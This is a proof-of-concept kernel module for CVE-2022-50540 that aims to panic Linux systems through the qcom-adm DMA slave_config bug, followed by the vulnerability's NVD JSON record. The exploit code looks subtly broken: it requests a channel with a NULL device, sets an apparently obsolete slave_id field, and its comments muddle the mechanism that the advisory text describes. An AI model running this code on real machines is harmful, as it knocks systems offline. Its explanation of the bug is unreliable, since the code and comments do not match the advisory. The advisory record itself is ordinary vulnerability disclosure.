CVE-2022-50540

// CVE-2022-50540 PoC - Trigger kernel panic via qcom-adm slave_config // This PoC demonstrates how to trigger the vulnerability by calling // the dmaengine slave_config with a malformed peripheral_size value #include <linux/module.h> #include <linux/kernel.h> #include <linux/dmaengine.h> #include <linux/dma-mapping.h> MODULE_LICENSE("GPL"); MODULE_AUTHOR("Security Researcher"); MODULE_DESCRIPTION("PoC for CVE-2022-50540 qcom-adm sizeof bug"); static int __init poc_init(void) { struct dma_chan *chan; struct dma_slave_config config = {0}; int ret; // Request a DMA channel from qcom-adm driver // On vulnerable systems, this will succeed if the platform uses ADM chan = dma_request_chan(NULL, "qcom-adm"); if (IS_ERR(chan)) { pr_info("CVE-2022-50540: Failed to get qcom-adm channel\n"); return PTR_ERR(chan); } // Set peripheral_size to an invalid large value // Due to the sizeof bug, this value bypasses validation // because it's compared against sizeof(pointer)=8 instead of // sizeof(struct dma_slave_config) config.peripheral_size = 0xFFFFFFFF; // Invalid size config.direction = DMA_MEM_TO_DEV; config.src_addr = 0x0; config.dst_addr = 0x0; // crci value is ignored due to the bug config.slave_id = 0xDEADBEEF; // Trigger the vulnerable slave_config function // On vulnerable kernels, this will cause kernel panic ret = dmaengine_slave_config(chan, &config); if (ret < 0) { pr_info("CVE-2022-50540: slave_config returned %d\n", ret); } dma_release_channel(chan); return 0; } static void __exit poc_exit(void) { pr_info("CVE-2022-50540: PoC module unloaded\n"); } module_init(poc_init); module_exit(poc_exit);

{"cve": {"id": "CVE-2022-50540", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:38.320", "lastModified": "2026-02-26T23:16:43.437", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: qcom-adm: fix wrong sizeof config in slave_config\n\nFix broken slave_config function that uncorrectly compare the\nperipheral_size with the size of the config pointer instead of the size\nof the config struct. This cause the crci value to be ignored and cause\na kernel panic on any slave that use adm driver.\n\nTo fix this, compare to the size of the struct and NOT the size of the\npointer."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.17", "versionEndExcluding": "5.19.17", "matchCriteriaId": "CD3C570A-0615-41B8-962A-EA2AACAEB3BF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0", "versionEndExcluding": "6.0.3", "matchCriteriaId": "5BCD8201-B847-4442-B894-70D430128DEF"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/7490274b41a432824f7df5071ace3df2ab59caa7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7c8765308371be30f50c1b5b97618b731514b207", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f1dd45a6585a1689e1e8906b3f9e302b9d40c715", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}